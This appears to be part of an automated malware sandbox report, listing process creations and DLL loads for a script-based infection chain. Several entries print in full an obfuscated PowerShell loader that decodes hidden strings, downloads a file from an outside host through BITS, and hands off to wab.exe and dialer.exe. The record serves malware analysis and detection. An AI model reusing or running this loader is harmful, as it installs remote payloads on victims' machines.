'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BrJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BrJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
